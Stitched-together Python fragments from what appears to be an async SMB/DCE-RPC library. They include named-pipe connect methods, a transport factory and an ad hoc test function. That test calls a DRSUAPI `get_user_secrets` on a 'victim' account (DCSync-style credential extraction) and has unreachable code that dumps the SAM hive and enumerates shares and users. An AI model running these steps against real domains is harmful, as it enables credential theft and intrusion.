async def connect(self, open = True):
    """Create ``self.dce`` on the ``svcctl`` named pipe and bind it to SCMR.

    Args:
        open: when equal to ``True``, ``self.open()`` is awaited after the bind.

    Nothing is caught here, so any failure propagates to the caller.
    """
    # Build the SMB transport and take its DCE/RPC object in one step.
    self.dce = SMBTransport(self.connection, filename=r'\svcctl').get_dce_rpc()
    await self.dce.connect()
    await self.dce.bind(scmr.MSRPC_UUID_SCMR)
    # Only a value that compares equal to True triggers the follow-up open().
    if open == True:
        await self.open()
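async def connect(self, open=True):
    """Bind ``self.dce`` to SAMR over the ``samr`` named pipe, trying at most twice.

    Args:
        open: when equal to ``True``, ``self.open()`` is awaited after the bind.

    Errors are printed, not raised. If both attempts fail the caller gets
    no exception, and ``self.dce`` may be missing or unbound.
    """
    for _attempt in range(2):
        try:
            rpctransport = SMBTransport(self.connection, filename=r'\samr')
            self.dce = rpctransport.get_dce_rpc()
            await self.dce.connect()
            await self.dce.bind(samr.MSRPC_UUID_SAMR)
            if open == True:
                await self.open()
        except Exception as e:
            # Best-effort: report the error and fall through to the next attempt.
            print(e)
        else:
            # Stop after the first successful bind. Without this the loop
            # opens and binds a second pipe and drops the reference to the
            # first one without closing it.
            return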
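async def connect(self, open = False):
    """Bind ``self.dce`` to RRP over the ``winreg`` named pipe, trying at most twice.

    Args:
        open: when equal to ``True``, ``self.open()`` is awaited after the bind.

    Errors are printed, not raised. If both attempts fail the caller gets
    no exception, and ``self.dce`` may be missing or unbound.
    """
    for _attempt in range(2):
        try:
            rpctransport = SMBTransport(self.connection, filename=r'\winreg')
            self.dce = rpctransport.get_dce_rpc()
            await self.dce.connect()
            await self.dce.bind(rrp.MSRPC_UUID_RRP)
            if open == True:
                await self.open()
        except Exception as e:
            # Best-effort: report the error and fall through to the next attempt.
            print(e)
        else:
            # Stop after the first successful bind. Without this the loop
            # opens and binds a second pipe and drops the reference to the
            # first one without closing it.
            return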
async def filereader_test(connection_string, filename):
    # Ad-hoc manual test: logs in over SMB and exercises several DCE/RPC
    # services against the host named in connection_string.
    # `filename` is accepted but never referenced in this body.
    # Target and credential are both parsed from the same connection string.
    target = SMBTarget.from_connection_string(connection_string)
    credential = SMBCredential.from_connection_string(connection_string)
    spneg = AuthenticatorBuilder.to_spnego_cred(credential, target)
    async with SMBConnection(spneg, target) as connection:
        await connection.login()
        try:
            # Domain name and account name below are hard-coded test values.
            t = SMBDRSUAPI(connection, 'TEST.corp')
            await t.connect()
            await t.open()
            # Blocks on stdin until the operator presses Enter.
            input('open succsess!')
            await t.get_user_secrets('victim')
        except Exception as e:
            import traceback
            traceback.print_exc()
            print('Error! %s' % e)
        # NOTE(review): the listing lost its indentation. This return is placed
        # after the try/except, which makes everything below unreachable.
        # Confirm its nesting against the original file.
        return
        # Unreachable as laid out: saves the SAM hive to a randomly named
        # .tmp file through the remote registry service.
        # NOTE(review): nothing in this function deletes that file afterwards,
        # so re-enabling this path leaves the hive copy on the remote host.
        tmpFileName = os.urandom(4).hex() + '.tmp'
        rreg = SMBRemoteRegistryService(connection)
        await rreg.save_hive('SAM', tmpFileName)
        print('Success! Registry file should be in %s' % ('SYSTEM32\\' + tmpFileName))
        await rreg.close()
        return
        # Unreachable after the return above: share enumeration over srvsvc.
        rpctransport = SMBTransport(connection, filename=r'\srvsvc')
        dce = rpctransport.get_dce_rpc()
        await dce.connect()
        await dce.bind(srvs.MSRPC_UUID_SRVS)
        resp = await srvs.hNetrShareEnum(dce, 1)
        print(resp['InfoStruct']['ShareInfo']['Level1']['Buffer'])
        # Workstation user enumeration over wkssvc.
        rpctransport = SMBTransport(connection, filename=r'\wkssvc')
        dce = rpctransport.get_dce_rpc()
        await dce.connect()
        await dce.bind(wkst.MSRPC_UUID_WKST)
        resp = await wkst.hNetrWkstaUserEnum(dce, 1)
        print(resp['UserInfo']['WkstaUserInfo']['Level1']['Buffer'])
        # Exact repeat of the wkssvc block above.
        rpctransport = SMBTransport(connection, filename=r'\wkssvc')
        dce = rpctransport.get_dce_rpc()
        await dce.connect()
        await dce.bind(wkst.MSRPC_UUID_WKST)
        resp = await wkst.hNetrWkstaUserEnum(dce, 1)
        print(resp['UserInfo']['WkstaUserInfo']['Level1']['Buffer'])
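def DCERPCTransportFactory(stringbinding, connection):
    """Build the transport object named by a DCE/RPC string binding.

    Args:
        stringbinding: string binding handed to ``DCERPCStringBinding``.
        connection: passed to ``DCERPCStringBinding`` and to the transport
            constructor.

    Returns:
        A ``TCPTransport`` for ``ncacn_ip_tcp`` or an ``SMBTransport`` for
        ``ncacn_np``.

    Raises:
        NotImplementedError: for ``ncadg_ip_udp``, ``ncacn_http`` and
            ``ncalocal``, which have no transport here.
        DCERPCException: for any other protocol sequence.
    """
    sb = DCERPCStringBinding(stringbinding, connection)
    na = sb.get_network_address()
    ps = sb.get_protocol_sequence()

    # UDP, HTTP and local transports are not available in this factory.
    # NotImplementedError is still an Exception, so existing handlers match.
    if ps in ('ncadg_ip_udp', 'ncacn_http', 'ncalocal'):
        raise NotImplementedError('Not Implemented!')

    if ps == 'ncacn_ip_tcp':
        port = sb.get_endpoint()
        if port:
            return TCPTransport(connection, na, int(port))
        return TCPTransport(connection, na)

    if ps == 'ncacn_np':
        named_pipe = sb.get_endpoint()
        if not named_pipe:
            return SMBTransport(connection, na)
        # Strip the leading "\pipe" only when it is actually there. Slicing
        # blindly would cut five characters off an endpoint that was given
        # without the prefix and hand the transport a wrong pipe name.
        prefix = r'\pipe'
        if named_pipe.lower().startswith(prefix + '\\'):
            named_pipe = named_pipe[len(prefix):]
        return SMBTransport(connection, na, filename=named_pipe)

    raise DCERPCException("Unknown protocol sequence.")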
async def connect(self, open=True):
    """Create ``self.dce`` on the ``srvsvc`` named pipe and bind it to SRVS.

    ``open`` is accepted but not used by this method. Nothing is caught
    here, so any failure propagates to the caller.
    """
    # Build the SMB transport and take its DCE/RPC object in one step.
    self.dce = SMBTransport(self.connection, filename=r'\srvsvc').get_dce_rpc()
    await self.dce.connect()
    await self.dce.bind(srvs.MSRPC_UUID_SRVS)
async def connect(self, open=True):
    """Create ``self.dce`` on the ``lsarpc`` named pipe and bind it to LSAD.

    ``open`` is accepted but not used by this method. Nothing is caught
    here, so any failure propagates to the caller.
    """
    # Build the SMB transport and take its DCE/RPC object in one step.
    self.dce = SMBTransport(self.connection, filename=r'\lsarpc').get_dce_rpc()
    await self.dce.connect()
    await self.dce.bind(lsad.MSRPC_UUID_LSAD)